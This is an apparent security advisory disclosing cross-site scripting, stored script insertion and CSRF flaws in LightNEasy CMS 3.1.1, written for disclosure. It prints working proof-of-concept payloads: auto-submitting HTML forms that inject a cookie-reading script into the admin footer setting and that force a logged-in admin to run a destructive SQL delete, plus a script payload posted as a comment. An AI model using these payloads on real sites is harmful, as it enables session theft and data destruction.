Total Tests:

Multiple Vulnerabilities in LightNEasy CMS

Advisory ID:HTB22387
Product:LightNEasy CMS
Vendor:Fernando Baptista
Vulnerable Versions:3.1.1 and Probably Previous Versions and probably prior
Tested Version:3.1.1 and Probably Previous Versions
Advisory Publication:May 18, 2010 [without technical details]
Vendor Notification:May 18, 2010
Public Disclosure:June 1, 2010
Vulnerability Type:Cross-Site Scripting [CWE-79]
Cross-Site Scripting [CWE-79]
Cross-Site Request Forgery [CWE-352]
Risk Level:Medium
CVSSv2 Base Scores:2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
5 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in LightNEasy CMS which could be exploited to perform script insertion, cross-site scripting and cross-site request forgery attacks.

1) Cross-site scripting (XSS) vulnerability in LightNEasy CMS
1.1 The vulnerability exists due to input sanitation error in the "footer" parameter in LightNEasy/admin.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires victim to be logged-in as an administrator.
Exploitation example:
<form action="http://host/LightNEasy.php?do=setup" method="post" name="main">
<input type="hidden" name="password" value="" />
<input name="admin" type="hidden" value='admin' />
<input type="hidden" name="email" value="example@example.com" />
<input type="hidden" name="wemail" value="example@example.com" />
<input type="hidden" name="restricted" value="" />
<input type="hidden" name="homepath" value="./" />
<input type="hidden" name="template" value="lightneasy" />
<input type="hidden" name="title" value="site title" />
<input type="hidden" name="subtitle" value="site subtitle" />
<input type="hidden" name="keywords" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="author" value="" />
<input type="hidden" name="footer" value='hello"><script>alert(document.cookie)</script>' />
<input type="hidden" name="timeoffset" value="0" />
<input type="hidden" name="dateformat" value="%m/%d/%y - %I:%M %p" />
<input type="hidden" name="indexfile" value="LightNEasy.php" />
<input type="hidden" name="language" value="en_US" />
<input type="hidden" name="langeditor" value="en" />
<input type="submit" name="submit" value="Save Setup" id="mybtn" />
</form>
<script>
document.getElementById("mybtn").click();
</script>


2) Script insertion vulnerability in LightNEasy CMS
An input sanitation error exists in the "commentmessage" field in LightNEasy/common.php. A remote attacker can insert arbitrary HTML and script code, which will be executed in user`s browser in context of the vulnerable website when the user reads published comments.
Exploitation example:
The attacker can leave his comment on the following page:
"http://host/LightNEasy.php?page=news"
And fill in the form as follows:
Your name: example
Your e-mail: example@example.com
Your comment: <script>alert(document.cookie)</script>
Code: Enter Captcha code

After the comment is published the malicious code will be executed on the following page:
http://example.com/LightNEasy.php?page=news&id=1&showcomments=1

3) Cross-site request forgery (CSRF) in LightNEasy CMS
The vulnerability exists due to insufficient validation of the request origin in LightNEasy/admin.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and execute arbitrary SQL commands in application`s database.
Exploitation example:
<form action="http://host/LightNEasy.php?do=database" method="post" name="main">
<input type="hidden" name="query" value="delete from lne_menu where m3=1" />
<input type="submit" name="submit" value="Query Database" id="mybtn" />
</form>
<script>
document.getElementById("mybtn").click();
</script>

How to Detect Cross-Site Scripting Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Vulnerability #2 was fixed in version 3.2


References:
[1] High-Tech Bridge Advisory HTB22387 - https://www.immuniweb.com/advisory/HTB22387 - Multiple Vulnerabilities in LightNEasy CMS
[2] LightNEasy CMS - www.lightneasy.org - LightNEasy is a simple to use Content Management System that will allow you to make a website literally in minutes.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a Technical Question?

Our security experts will answer within
one business day. No obligations.

Have a Sales Question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
*
Your data will stay private and confidential